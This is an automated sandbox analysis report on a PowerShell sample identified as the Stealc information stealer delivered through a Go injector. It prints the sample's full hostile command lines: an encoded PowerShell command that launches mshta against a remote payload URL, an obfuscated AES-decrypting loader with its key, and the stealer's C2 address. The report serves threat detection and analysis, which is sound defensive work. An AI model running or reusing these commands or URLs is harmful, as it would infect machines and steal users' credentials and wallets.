Windows Analysis Report
verification.b-cdn.net.ps1

Overview

General Information

Sample name: verification.b-cdn.net.ps1
Analysis ID: 1491044
MD5: 4c99ba8c0fcf994162c991b2b6601509
SHA1: 4790b36cdbbededed079473ff1c5c34637f2a2f6
SHA256: 8d80e5c7d07aef7d4565f4ddc61d3fc5819a5ea68f2d5282e6ae3e5e17d60e3d
Tags: ps1

Detection

Go Injector, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected Go Injector
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Injects a PE file into a foreign process
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Very long command line found
Writes to foreign memory regions
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 7100 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA== MD5: 04029E121A0CFA5991749937DD22A1D9)
      • mshta.exe (PID: 7172 cmdline: "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1 MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
        • powershell.exe (PID: 7336 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnxA('649390CFEBE1770BAA5146DE729123CCD838E758E4276A363F637B3AAF033337AC0657955271E9550F501406601E1A41860E46E19B664FF95794FF1F3D04636BD08F0C38C4B63E80890B016BD8AB0B78879EF113B89A3F38F6F895DE87AEA8D3B7F0CCEB19C1832E835097ECCB2C36890967C12BEB560476870CFCA3B2026770977E5BFC6237BA383AB0C9BC4FEE55E653DB382E41C9866A6C0222D784911F31EBB65E3730429D060FF2E1FCA15D8F85018D75055E5F3D7F26332EE40768EC9BAFDC24FC0691D6B57AB81120A83FF0208197B7794EB8E48F081D5265C2EDE5BE7C897C05ABF2349EBA71B3759948F6CC4E3D2AA8CB8B87BC3EF6DD53F55E24B1A14B06982580B23E1CDC89A89E5FC9AEBCC45162B160BDD6D1DD820E751C213F642E6174AB940A544437CBD4B95F451F49854521B6B5F25DC2958288B9E8AE3E84EC687BF5FD542FD21B03B728755D38B9F795538690A1731AD87A4FF035E0E4DF4D5D5926749BCC457636F04DB20D58FEF916462DCAC2915FF336ECE4C613138832FB8CB53EC4DDA139297818B53354F21F92E9A237CDEA5EBA27FD7E08ABAD8BC364C8AC9D4DA7EF88987044E30E52F804D80E2DCF76EB0C85804D4469E0F07C9E5CE26611DE49AD0BB0333D282354BE10F943982430B1169A615E79E3E0C5EC79DA387AD53EAF2FD764DBB293F0EF18D616EEF99C38992715145D16CA68D09F1D913D460445AD05E1641EE4AC2B1E944F7FF45B6C7C51974DECC8B09B1CCBDC8ED7174A14C70F59EA9B96E93E8A336D668FF3C2DC68D75472553892C38D8F32E86361D381E1EE6E6E1BCA21FA73FC43DDDAFCED280453E7B5D154F59EF2BE213C2656F282EABC6A8D2F17A8B47C539E9817820B02E234FD821466297478CF4C06BF88B97D45DCF3E4C807DE237AD7614DCD6332D4DE950C177646C50F08062E130279ECE8B08C9945A79ECF6C4B88024A24DC840A12E22F404F56B7C13E2F9DC8AADEB49ECC7A67AE9983475129E57AFB8D0F9326B22E9B79AAA56DB3EEC92EA9708998095778497441E15D7795F50116CF78185726E9A7F7A3E40D436D50F77BDA8DDDBFD8CEBB4C758EA3595453635FE911BA9691EB0E2A28529D8C4B9E2D50DD40CBDBC57F9D07995096EB6B48448429C1F014B7BDF9146EC21A79ADA827E6590D159548021642354333FC8154696C9E79B4CDA3E5D22551F1F2387AAA9CE4464C571969727F845599B1BD312EB356A5E140EC6
F91912B1227B9F3A941727413D53C0FE2B26DE40BB2B36462055BBF7E8A6B8281CC7FFD4048A1CD97104C3A63FF87CE63106EF7443D01D5FCE1FD67A7E73EE2A8F2CD2EFED7B4A7796DB2328BD317F0349F8B606845CBF4FC0F73D45630EF3466836C0A93133F760481FB4E2F4E46DBFF6A7AA0455989567090A3EBB373F3EC52B5EE0558518BC12408677670492BEA93021308DF47CD62CF99B8E473176B2965284653204CE093A6D8CE56300896793A61754D407EB838A56372881C0664AF37F1E9500BBAC243013C5F5953ABE1CD43347B87C2D6ED6169C7B0D8242DE3ED14C3F856F471A13CEFE0993EE315D5305CC2AC9054976C9CA5A6');$jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
          • conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • 0SmartAssem.exe (PID: 7716 cmdline: "C:\Users\user\AppData\Roaming\0SmartAssem.exe" MD5: 517C4A0A27D1C022A3319AF316407810)
            • BitLockerToGo.exe (PID: 7916 cmdline: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
  • svchost.exe (PID: 7256 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers: sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: none
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://193.176.153.234/587ec30955d49a9c.php"}
Source: C:\Users\user\AppData\Roaming\0SmartAssem.exe
Rule: JoeSecurity_GoInjector_2
Description: Yara detected Go Injector
Author: Joe Security

Source: 00000008.00000002.1996165603.000000C000380000.00000004.00001000.00020000.00000000.sdmp
Rule: Msfpayloads_msf_9
Description: Metasploit Payloads - file msf.war - contents
Author: Florian Roth
Strings:
  • 0x0:$x1: 4d5a9000030000000

Source: 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmp
Rule: JoeSecurity_Stealc
Description: Yara detected Stealc
Author: Joe Security

Source: 00000008.00000000.1897589705.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmp
Rule: JoeSecurity_GoInjector_2
Description: Yara detected Go Injector
Author: Joe Security

Source: 00000008.00000002.2003314361.00007FF74D0EC000.00000002.00000001.01000000.00000011.sdmp
Rule: JoeSecurity_GoInjector_2
Description: Yara detected Go Injector
Author: Joe Security

Source: Process Memory Space: powershell.exe PID: 7336
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0x50651:$b1: ::WriteAllBytes(
  • 0x51171:$b1: ::WriteAllBytes(
  • 0x23d19:$s1: -join
  • 0x2461f:$s1: -join
  • 0x4e175:$s1: -join
  • 0x1eb5b:$s4: +=
  • 0x1eb7a:$s4: +=
  • 0x1ebb5:$s4: +=
  • 0x1ebd2:$s4: +=
  • 0x1ec0d:$s4: +=
  • 0x1ec79:$s4: +=
  • 0x1ed05:$s4: +=
  • 0x1ee13:$s4: +=
  • 0x20ade:$s4: +=
  • 0x20b01:$s4: +=
  • 0x259ee:$s4: +=
  • 0x27e8d:$s4: +=
  • 0x27f0c:$s4: +=
  • 0x28127:$s4: +=
  • 0x281aa:$s4: +=
  • 0x28b2b:$s4: +=

Source: 8.2.0SmartAssem.exe.7ff74ca60000.8.unpack
Rule: JoeSecurity_GoInjector_2
Description: Yara detected Go Injector
Author: Joe Security

Source: 8.0.0SmartAssem.exe.7ff74ca60000.0.unpack
Rule: JoeSecurity_GoInjector_2
Description: Yara detected Go Injector
Author: Joe Security

Source: amsi64_7336.amsi.csv
Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC
Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Author: ditekSHen
Strings:
  • 0xc6e3:$b1: ::WriteAllBytes(
  • 0xc356:$s1: -join
  • 0x5b02:$s4: +=
  • 0x5bc4:$s4: +=
  • 0x9deb:$s4: +=
  • 0xbf08:$s4: +=
  • 0xc1f2:$s4: +=
  • 0xc338:$s4: +=
  • 0x19bb7:$s4: +=
  • 0x19cbb:$s4: +=
  • 0x1d117:$s4: +=
  • 0x1d7f7:$s4: +=
  • 0x1dcad:$s4: +=
  • 0x1dd02:$s4: +=
  • 0x1df76:$s4: +=
  • 0x1dfa5:$s4: +=
  • 0x1e4ed:$s4: +=
  • 0x1e51c:$s4: +=
  • 0x1e5fb:$s4: +=
  • 0x20892:$s4: +=
  • 0x20bf4:$s4: +=

              System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Tim Shelton; Data: Command: "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1, CommandLine: "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4108, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://bidvertiser.b-cdn.net/smart1, ProcessId: 7172, ProcessName: mshta.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -split ($ZzZovm -replace '..', '0x$& ')};$PEcdKn = HbAHmnx…jqkxh = [System.Security.Cryptography.Aes]::Create();$jqkxh.Key = HbAHmnxA('52615577706262664D6D43476F4F4344');$jqkxh.IV = New-Object byte[] 16;$SpkOqCAK = $jqkxh.CreateDecryptor();$cWklkDGxO = $SpkOqCAK.TransformFinalBlock($PEcdKn, 0, $PEcdKn.Length);$mTmnXpOAf = [System.Text.Encoding]::Utf8.GetString($cWklkDGxO);$SpkOqCAK.Dispose();& $mTmnXpOAf.Substring(0,3) $mTmnXpOAf.Substring(3), CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function HbAHmnxA($ZzZovm){return -spl
Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, ProcessId: 4108, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", ProcessId: 7100, ProcessName: powershell.exe
Source: File created; Author: frack113, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7336, TargetFilename: C:\Users\user\AppData\Roaming\Qt5PrintSupportVBox.dll
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7100, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AYgBpAGQAdgBlAHIAdABpAHMAZQByAC4AYgAtAGMAZABuAC4AbgBlAHQALwBzAG0AYQByAHQAMQAiAA==, ProcessId: 4108, ProcessName: powershell.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\verification.b-cdn.net.ps1", ProcessId: 7100, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7256, ProcessName: svchost.exe
Timestamp: 2024-08-10T19:10:37.251997+0200
SID: 2044243
Severity: 1
Source Port: 49743
Destination Port: 80
Protocol: TCP
Classtype: Malware Command and Control Activity Detected

Timestamp: 2024-08-10T19:10:02.529769+0200
SID: 2026434
Severity: 1
Source Port: 443
Destination Port: 49730
Protocol: TCP
Classtype: A Network Trojan was detected

              AV Detection

Source: https://bidvertiser.b-cdn.net/smart1.zip; Avira URL Cloud: Label: malware
Source: https://bidvertiser.b-cdn.net/smart1; Avira URL Cloud: Label: malware
Source: https://bidvertiser.b-cdn.net/smart1...; Avira URL Cloud: Label: malware
Source: 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmp; Malware Configuration Extractor: StealC {"C2 url": "http://193.176.153.234/587ec30955d49a9c.php"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\smart1[1]; ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\smart1[1]; Virustotal: Detection: 28%
Source: C:\Users\user\AppData\Roaming\0SmartAssem.exe; ReversingLabs: Detection: 18%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability